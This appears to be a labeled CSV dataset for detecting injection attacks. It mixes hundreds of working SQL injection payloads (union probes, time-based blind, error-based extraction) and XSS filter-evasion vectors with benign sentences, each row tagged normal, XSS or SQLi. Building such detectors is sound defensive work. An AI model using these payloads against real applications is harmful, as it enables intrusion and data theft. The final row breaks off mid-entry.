'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#",2,SQLi,10715 +"-8819"" ) where 9119 = 9119 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,20764 +1' ) ) and ( 7517 = 3423 ) *3423 and ( ( 'aenz' = 'aenz,2,SQLi,21170 +"1 where 4944 = 4944 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,19355 +<h1>INJECTX</h1>,1,XSS,9792 +"<small onkeyup=""alert(1)"" contenteditable>test</small>",1,XSS,7452 +or isNULL ( 1/0 ) /*,2,SQLi,11805 +Select ride.,0,normal,24613 +"1"" ) as advz where 5166 = 5166 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14505 +javascript:confirm(1),1,XSS,9427 +"<code draggable=""true"" ondragstart=""alert(1)"">test</code>",1,XSS,6937 +<tr id=x tabindex=1 onfocus=alert(1)></tr>,1,XSS,8239 +"-1988 where 4597 = 4597 union all select 4597,4597,4597,4597,4597,4597--",2,SQLi,21937 +"1 ) ) as wmxa where 6485 = 6485 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17501 +"-4317"" ) ) as nxvn where 2566 = 2566 union all select 2566,2566,2566#",2,SQLi,21456 +"1%"" ) ) ) union all select null,null,null,null,null,null--",2,SQLi,17021 +"1"" ) as vdim where 1296 = 1296",2,SQLi,20445 +"1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) -- gkcl",2,SQLi,13054 +"1"" ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,17283 +"1' where 8969 = 8969 union all select null,null,null,null,null--",2,SQLi,19663 +1' ) as ncou where 9166 = 9166 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,12901 +"<hr draggable=""true"" ondrag=""alert(1)"">test</hr>",1,XSS,7773 +"1"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( ""pnsz"" like ""pnsz",2,SQLi,19053 +"1"" ) ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,18963 +"1%' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( '%' = '",2,SQLi,20047 +"-6130 union all select 3211,3211,3211,3211,3211,3211,3211,3211,3211#",2,SQLi,17104 +"1%"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,22292 +"-7559"" or 8792 = 6905--",2,SQLi,14181 +"<style>:target {color:red;}</style><head id=x style=""transition:color 1s"" ontransitionend=alert(1)></head>",1,XSS,8318 +admin' or '1'='1'/*,2,SQLi,9871 +"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 5432 = 5432",2,SQLi,12417 +"-9046' ) ) as ymqc where 3733 = 3733 union all select 3733,3733,3733,3733,3733,3733,3733--",2,SQLi,12938 +"-->'""/></sCript><deTailS open x="">"" ontoggle=(co\u006efirm)``>",1,XSS,9526 +1' ) and sleep ( 5 ) #,2,SQLi,17132 +))) waitfor delay '0:0:20' --,2,SQLi,10835 +1 and 5934 = 7745,2,SQLi,13459 +1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 'guxv' = 'guxv,2,SQLi,13067 +"1' ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16907 +"<style>:target {color:red;}</style><picture id=x style=""transition:color 1s"" ontransitionend=alert(1)></picture>",1,XSS,1797 +<marquee onstart=alert(1)>XSS</marquee>,1,XSS,35 +<script>\u{61}lert(1)</script>,1,XSS,183 +"1 where 5382 = 5382 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,19133 +"><img src=x onerror=javascript:alert(1)> +><img src=x onerror=javascript:alert('1')>",1,XSS,1214 +"1' in boolean mode ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,19888 +"<style>:target {transform: rotate(180deg);}</style><details id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></details>",1,XSS,4203 +"<plaintext onkeyup=""alert(1)"" contenteditable>test</plaintext>",1,XSS,8575 +"&lt;BGSOUND SRC=\""javascript&#058;alert('XSS');\""&gt;",1,XSS,935 +"1'|| ( select 'ybfo' from dual where 3319 = 3319 union all select null,null,null,null,null,null,null,null#",2,SQLi,17363 +"<div draggable=""true"" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li>",1,XSS,5922 +Select votes could use a blockchain-based mobile app to vote.,0,normal,25536 +"1"" ) ) as krro where 1050 = 1050 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,13107 +"1"" ) where 3084 = 3084 union all select null,null--",2,SQLi,19552 +1)) or pg_sleep(5)--,2,SQLi,10264 +",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10802 +"-5667%' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( '%' = '",2,SQLi,21242 +Insert the data.,0,normal,22861 +"Available in Playback Mode, the D-Lighting function lets users select images with excessive backlight or insufficient flash.",0,normal,26293 +"select pg_sleep ( 5 ) and ( ( ( ""nvuv"" like ""nvuv",2,SQLi,13939 +"1 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,17097 +"1"" ) ) as phis where 4420 = 4420 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17593 +&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;,1,XSS,1331 +&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;,1,XSS,1358 +"<bdo onmouseout=""alert(1)"">test</bdo>",1,XSS,2856 +")) and 0=benchmark(3000000,MD5(1))%20%23 +'))) and 0=benchmark(3000000,MD5(1))%20/* +'))) and 0=benchmark(3000000,MD5(1))%20-- +'))) and 0=benchmark(3000000,MD5(1))%20%23 +))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,22438 +"select pg_sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,21291 +"<area onmouseenter=""alert(1)"">test</area>",1,XSS,3770 +"<!--<img src=""--><img src=x onerror=javascript:alert(1)//"">",1,XSS,586 +<bgsound id=x tabindex=1 onactivate=alert(1)></bgsound>,1,XSS,3563 +"<source draggable=""true"" ondragleave=""alert(1)"">test</source>",1,XSS,5036 +<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus>,1,XSS,4795 +"select * from users where id = '1'<@.. union select 1,version ( ) -- 1'",2,SQLi,11491 +"You can shop select featured deals, and take an extra 20% off select styles with the promo code ""BDAY20"" at checkout.",0,normal,25053 +coalesce,0,normal,23160 +<slot onpointerout=alert(1)>XSS</slot>,1,XSS,8252 +"<blink draggable=""true"" ondrag=""alert(1)"">test</blink>",1,XSS,5478 +<iframe src=http://xss.rocks/scriptlet.html <,1,XSS,252 +1' ) ) rlike ( select ( case when ( 8489 = 8820 ) then 1 else 0x28 end ) ) and ( ( 'fbjf' = 'fbjf,2,SQLi,16048 +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>",1,XSS,8938 +Insert the fresh cartridge.,0,normal,22719 +"1 ) where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14075 +"<audio draggable=""true"" ondragstart=""alert(1)"">test</audio>",1,XSS,2437 +"<nobr oncontextmenu=""alert(1)"">test</nobr>",1,XSS,2005 +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus>,1,XSS,3616 +"1"" ) ) as dvpb where 6673 = 6673",2,SQLi,21087 +Samsung EVO Select microSDXC (128 GB) — £19.99 (list price £25.99),0,normal,25692 +"1%' ) ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( '%' = '",2,SQLi,12065 +<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//,1,XSS,9402 +select ( case when ( 5152 = 7853 ) then 5152 else 5152* ( select 5152 from mysql.db ) end ) #,2,SQLi,18476 +"-4327"" or make_set ( 3107 = 1781,1781 ) and ""lclf"" like ""lclf",2,SQLi,17343 +<wbr onpointerover=alert(1)>XSS</wbr>,1,XSS,3734 +"<div id=""125""><?xml version=""1.0""?>",1,XSS,9060 +Delete the expired coupons from your wallet.,0,normal,22941 +They always select carefully.,0,normal,24390 +Please unban pubg and ignore the lame excuses of PTA who most important reason is youth has selected you as PM.,0,normal,26439 +[a](javascript:alert&#65534;(1&#41;),1,XSS,9377 +"1"" ) where 4112 = 4112",2,SQLi,17345 +"1' and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and 'ccsb' = 'ccsb",2,SQLi,21653 +"-4905"" union all select 6082,6082--",2,SQLi,18970 +<colgroup onpointerenter=alert(1)>XSS</colgroup>,1,XSS,6135 +1') WAITFOR DELAY '0:0:5' AND ('1337'='1337,2,SQLi,11244 +"1'+ ( select pxsd where 2576 = 2576 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) ) +'",2,SQLi,15320 +Select save.,0,normal,24557 +"The Consumer Staples Select Sector SPDR ETF (XLP) and the Utilities Select Sector SPDR ETF (XLU) are up 5.95 percent and 1.63 percent, respectively, since Oct. 1.",0,normal,25432 +") or ""1""=""1",2,SQLi,9930 +"<html onmouseleave=""alert(1)"">test</html>",1,XSS,6380 +"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,296 +"<<SCRIPT>alert("""");//\<</SCRIPT>",1,XSS,7577 +Join the fitness session.,0,normal,22718 +x' AND members.email IS NULL; --,2,SQLi,10019 +<del id=x tabindex=1 onbeforeactivate=alert(1)></del>,1,XSS,4032 +Select a medium or dark eyeliner color for lining your eyes.,0,normal,25622 +<summary onpointermove=alert(1)>XSS</summary>,1,XSS,8035 +<keygen onpointermove=alert(1)>XSS</keygen>,1,XSS,5130 +"<body BACKGROUND=""javascript:document.vulnerable=true;"">",1,XSS,1428 +<frameset id=x tabindex=1 onactivate=alert(1)></frameset>,1,XSS,8328 +Affiliated groups may select two members to vote at annual general meetings.,0,normal,26359 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ""eboa"" like ""eboa",2,SQLi,22316 +"-9937' ) ) union all select 3900,3900,3900,3900,3900,3900,3900,3900,3900#",2,SQLi,19675 +-2715' ) ) or 6942 = 1636 and ( ( 'mqeq' = 'mqeq,2,SQLi,19539 +"select * from users where id = '1' * ( 1 ) union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,11910 +<img onpointerup=alert(1)>XSS</img>,1,XSS,5077 +"<acronym draggable=""true"" ondrag=""alert(1)"">test</acronym>",1,XSS,1958 +AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i,2,SQLi,10978 +javascript:document.location=,1,XSS,1704 +"1%"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ""%"" = """,2,SQLi,19013 +"-5827"" ) as lskq where 7683 = 7683 union all select 7683,7683,7683,7683,7683#",2,SQLi,12210 +desc%2c(select*from(select(sleep(5)))a),2,SQLi,11067 +-8945 ) ) as fszo where 2320 = 2320 union all select 2320--,2,SQLi,14937 +"<style>:target {color:red;}</style><textarea id=x style=""transition:color 1s"" ontransitionend=alert(1)></textarea>",1,XSS,1919 +-5500' ) order by 1--,2,SQLi,16232 +"<time onmouseleave=""alert(1)"">test</time>",1,XSS,4626 +Select the best photo.,0,normal,22593 +"-1710"" ) ) as cvky where 1858 = 1858 union all select 1858,1858--",2,SQLi,16814 +"<s onmouseleave=""alert(1)"">test</s>",1,XSS,4569 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,22510 +<th onpointerup=alert(1)>XSS</th>,1,XSS,7224 +Select a tea flavor to relax.,0,normal,24221 +<image onblur=alert(1) tabindex=1 id=x></image><input autofocus>,1,XSS,2339 +<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg>,1,XSS,5664 +"<style>:target {transform: rotate(180deg);}</style><ul id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></ul>",1,XSS,7873 +"<style>@keyframes slidein {}</style><iframe style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></iframe>",1,XSS,3363 +Let's discuss where to go for the weekend.,0,normal,23946 +between,0,normal,23105 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dir>",1,XSS,7715 +"1"" ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""ytju"" like ""ytju",2,SQLi,21510 +<svg><form onload=alert(1)></form>,1,XSS,8611 +"1"" ) ) as dnhd where 2657 = 2657 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,12034 +"1%"" ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ""%"" = """,2,SQLi,16284 +"select * from users where id = 1 or "" ( &"" or 1 = 1 -- 1",2,SQLi,11770 +"-2715' ) ) union all select 8646,8646,8646,8646,8646,8646,8646,8646--",2,SQLi,13011 +ORDER BY 26#,2,SQLi,10193 +<body onblur=alert(1) id=x><iframe id=x>,1,XSS,2969 +"1%' ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( '%' = '",2,SQLi,17542 +<bdo id=x tabindex=1 onfocus=alert(1)></bdo>,1,XSS,2044 +"1"" ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ""jebr"" like ""jebr",2,SQLi,18398 +<track onblur=alert(1) tabindex=1 id=x></track><input autofocus>,1,XSS,4294 +"1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#",2,SQLi,20710 +<thead onpointermove=alert(1)>XSS</thead>,1,XSS,7647 +"<strong onmouseleave=""alert(1)"">test</strong>",1,XSS,8149 +or 3 = 3,2,SQLi,11437 +"<var oncontextmenu=""alert(1)"">test</var>",1,XSS,3586 +<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus>,1,XSS,4287 +);waitfor delay '0:0:5'--,2,SQLi,10255 +"-7460"" union all select 4273,4273,4273,4273,4273,4273,4273,4273#",2,SQLi,14382 +<marquee><script>alert('XSS')</script></marquee>,1,XSS,1232 +"1 and make_set ( 8403 = 8403,8899 ) -- rbxf",2,SQLi,17955 +"1' ) ) as ewsw where 4667 = 4667 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,18179 +"1"" or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14816 +Select the freshest ingredients for the recipe.,0,normal,24027 +"<ruby onbeforecopy=""alert(1)"" contenteditable>test</ruby>",1,XSS,3883 +"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,22154 +"-9810' ) where 4361 = 4361 or elt ( 1032 = 1032,3623 ) --",2,SQLi,14640 +"1' ) as jiic where 6158 = 6158 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,19425 +1' where 4253 = 4253,2,SQLi,20526 +Select modify.,0,normal,24578 +"<svg ondblclick=""alert(1)"">test</svg>",1,XSS,6316 +"<sup onbeforepaste=""alert(1)"" contenteditable>test</sup>",1,XSS,3804 +"<style>@keyframes x{}</style><audio style=""animation-name:x"" onanimationend=""alert(1)""></audio>",1,XSS,8014 +"<output onmouseleave=""alert(1)"">test</output>",1,XSS,5715 +-8086%' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( '%' = ',2,SQLi,20037 +"<optgroup onkeypress=""alert(1)"" contenteditable>test</optgroup>",1,XSS,7217 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( '%' = '",2,SQLi,20726 +"-6463"" ) ) ) union all select 3280,3280,3280,3280,3280,3280,3280,3280,3280#",2,SQLi,16495 +<div onpointerout=alert(1)>XSS</div>,1,XSS,1766 +"<rt draggable=""true"" ondrag=""alert(1)"">test</rt>",1,XSS,7050 +&#x000003c;,1,XSS,1036 +"<big onmouseout=""alert(1)"">test</big>",1,XSS,7501 +"iif ( 9342 = 6508,1,1/0 )",2,SQLi,20015 +select sleep ( 5 ) and ( 4863 = 4863,2,SQLi,18886 +"<style>:target {color:red;}</style><dialog id=x style=""transition:color 1s"" ontransitionend=alert(1)></dialog>",1,XSS,3449 +1'+ ( select 'gprq' where 8928 = 8928,2,SQLi,21402 +"1'+ ( select 'ngdk' where 7264 = 7264 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) +'",2,SQLi,19422 +"<meter onmouseover=""alert(1)"">test</meter>",1,XSS,4223 +top['al\x65rt'](1),1,XSS,9330 +ORDER BY 11--,2,SQLi,10147 +"select count ( * ) from generate_series ( 1,5000000 ) #",2,SQLi,12349 +"1' union all select null,null,null,null#",2,SQLi,12984 +<x contenteditable onpaste=alert(1)>paste here!,1,XSS,9288 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))",2,SQLi,10612 +"<iframe src=""http://www.example.org/dropHere.html""></iframe>//[""'`-->]]>]</div>",1,XSS,9141 +"1"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,12592 +"1"" ) ) as hzcq where 9250 = 9250 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",2,SQLi,19411 +eval(a+b+c+d),1,XSS,3069 +"1'|| ( select 'fcnb' where 2869 = 2869 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) ||'",2,SQLi,17534 +How did you select the Montrealers you interviewed for the film?,0,normal,26039 +"<b onmouseup=""alert(1)"">test</b>",1,XSS,2075 +AND 1=1 AND '%'=',2,SQLi,10115 +"1' ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( 'tetk' = 'tetk",2,SQLi,19160 +"-3250%"" union all select 7162,7162,7162,7162,7162,7162,7162,7162,7162--",2,SQLi,19391 +"-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,20428 +<img2 onpointerdown=alert(1)>XSS</img2>,1,XSS,7020 +"1 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) # ujdg",2,SQLi,17877 +"-7060' ) or make_set ( 4233 = 1689,1689 ) and ( 'twpr' like 'twpr",2,SQLi,14628 +if ( 2823 = 3532 ) select 2823 else drop function kmqw--,2,SQLi,18822 +"<ul onmouseover=""alert(1)"">test</ul>",1,XSS,7259 +"1' ) ) as kxek where 3429 = 3429 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17024 +"select * from users where id = '1' <@<@ union select 1,version ( ) -- 1'",2,SQLi,11584 +Can't select that one.,0,normal,24420 + or 1=1 --,2,SQLi,10077 +"<div draggable=""true"" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th>",1,XSS,6519 +"<hr draggable=""true"" ondragend=""alert(1)"">test</hr>",1,XSS,7874 +"1' ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( 'mwyu' = 'mwyu",2,SQLi,12278 +"<var onmouseenter=""alert(1)"">test</var>",1,XSS,6843 +Select your inquire.,0,normal,24932 +<script>alert(1)//,1,XSS,9227 +"<html oncopy=""alert(1)"" contenteditable>test</html>",1,XSS,5383 +<menuitem onpointerenter=alert(1)>XSS</menuitem>,1,XSS,4565 +I will select the best outfit for the party tonight.,0,normal,23868 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></form>",1,XSS,7785 +"1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'drui' like 'drui",2,SQLi,15757 +"1"" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,17550 +"1%"" ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,14762 +"1%"" ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,19534 +"1"" ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,15091 +( select 2412 = ( 'qqpjq'|| ( select case 2412 when 2412 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ),2,SQLi,14207 +"1 ) as attr where 8085 = 8085 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12634 +"<style>@keyframes x{}</style><abbr style=""animation-name:x"" onanimationend=""alert(1)""></abbr>",1,XSS,3985 +stored,0,normal,23126 +"<rb draggable=""true"" ondragstart=""alert(1)"">test</rb>",1,XSS,6516 +"1 ) where 9149 = 9149 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,16581 +Where's the missing page?,0,normal,22658 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--",2,SQLi,10374 +"1'+ ( select uqdb where 3508 = 3508 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,21606 +Select a dessert to satisfy your craving.,0,normal,23993 +"1'|| ( select 'aair' where 9234 = 9234 union all select null,null,null,null#",2,SQLi,20124 +"1' ) as rqzz where 4987 = 4987 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12913 +"1' in boolean mode ) union all select null,null,null#",2,SQLi,19830 +"1' ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 'iwkg' = 'iwkg",2,SQLi,21820 +"1"" ) where 9062 = 9062",2,SQLi,21375 +<col onpointerover=alert(1)>XSS</col>,1,XSS,8198 +It is important you select the right one for your hard-earned cash.,0,normal,25922 +select ( case when ( 1868 = 5071 ) then 1 else 1868* ( select 1868 from master..sysdatabases ) end ) --,2,SQLi,18721 +"1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'nbsr' like 'nbsr",2,SQLi,21128 +1' ) ) as jbcd where 9078 = 9078 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,20931 +"<isindex onmousedown=""alert(1)"">test</isindex>",1,XSS,2716 +"-9297 ) union all select 6841,6841,6841,6841,6841--",2,SQLi,18969 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#",2,SQLi,10435 +<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus>,1,XSS,5261 +"1%' ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,20401 +"1 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,20387 +Join the team for lunch.,0,normal,22530 +"1"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""uglh"" like ""uglh",2,SQLi,19635 +"1' where 2162 = 2162 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,22234 +Select your race.,0,normal,24888 +"1'+ ( select 'wkcq' where 1020 = 1020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,19140 +<</script/script><script ~~~>\u0061lert(1)</script ~~~>,1,XSS,9689 +Select your assignment.,0,normal,24817 +"When you select the eraser, the options bar at the top of the screen will change.",0,normal,25106 +<embed onpointermove=alert(1)>XSS</embed>,1,XSS,3400 +"<style>@keyframes x{}</style><title style=""animation-name:x"" onanimationend=""alert(1)""></title>",1,XSS,1708 +He'll select wine.,0,normal,24391 +<big onpointermove=alert(1)>XSS</big>,1,XSS,8083 +"<bdo onmousemove=""alert(1)"">test</bdo>",1,XSS,4546 +"1' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( 'yqmv' = 'yqmv",2,SQLi,15219 +"javascript:""/*`/*\""/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``>",1,XSS,9454 +"<;TABLE BACKGROUND="";javascript:alert(';XSS';)"";>;<;/TABLE>;",1,XSS,1558 +"&lt;?xml&#58;namespace prefix=\""t\"" 